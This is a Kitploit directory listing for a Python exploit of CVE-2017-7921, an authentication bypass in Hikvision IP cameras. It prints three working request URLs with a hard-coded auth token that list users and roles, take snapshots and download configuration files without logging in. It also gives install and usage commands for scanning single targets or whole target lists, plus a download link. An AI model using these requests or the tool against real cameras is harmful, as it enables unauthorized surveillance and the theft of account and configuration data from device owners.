Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2017-7921-EXP — Python exploit for CVE-2017-7921 in Hikvision IP cameras, performing unauthenticated user enumeration, snapshot capture, and configuration file download via crafted HTTP requests. | Kitploit
Tools/GitHubGitHub/blacksheepstudio/cve-2017-7921-exp
IoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringAuthentication
GitHubblacksheepstudio/cve-2017-7921-exp

CVE-2017-7921-EXP

Python exploit for CVE-2017-7921 in Hikvision IP cameras, performing unauthenticated user enumeration, snapshot capture, and configuration file download via crafted HTTP requests.

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository
3 years agoNot yet reviewed

CVE-2017-7921 Exploit

An Improper Authentication issue was discovered in Hikvision devices.

​ The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users.

​ This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information.

​ https://seclists.org/fulldisclosure/2017/Sep/23

​ Vulnerability details:

​ ----------------------

​ Retrieve a list of all users and their roles:

​ http://camera.ip/Security/users?auth=YWRtaW46MTEK

​ Obtain a camera snapshot without authentication:

​ http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK

​ And worst of all, one can download camera configuration:

​ http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK

Install dependence

root@kitploit:~
python3 -m pip install -r requirements.txt

Usage

root@kitploit:~
python3 CVE_2017_7921_EXP.py -t xxx.xx.xx.xx run
python3 CVE_2017_7921_EXP.py -t ./targets.txt run

Screenshot

Download Tool